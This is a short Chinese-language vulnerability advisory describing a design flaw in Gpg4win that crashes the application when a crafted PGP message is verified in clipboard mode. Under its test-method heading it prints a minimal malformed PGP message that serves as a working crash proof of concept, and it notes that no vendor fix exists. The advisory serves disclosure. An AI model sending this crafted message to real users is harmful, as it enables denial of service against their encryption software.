漏洞起因
设计错误
影响系统
Gpg4win
不受影响系统
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意消息,诱使Gpg4win用户打开。
漏洞信息
Gpg4win是一款包含了GnuPG、WinPT、GPA等实用工具软件。
Gpg4win在剪贴板模式校验消息时存在漏洞,攻击者构建恶意的消息诱使用户打开,可导致应用程序崩溃。
测试方法
—–BEGIN PGP MESSAGE—–
Charset: ISO-8859-1
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: If you Verify me in Clipboard Mode, I go BOOM!
Comment: This is the absolute minimum of content to cause the crash
Comment: Doesn’t seem to overwrite anything though, even @ 10000+ chars
A==
=B00M
—–END PGP MESSAGE—–
厂商解决方案
目前没有详细解决方案提供:
http://www.gpg4win.org/
漏洞提供者
Dr_IDE
0 条评论。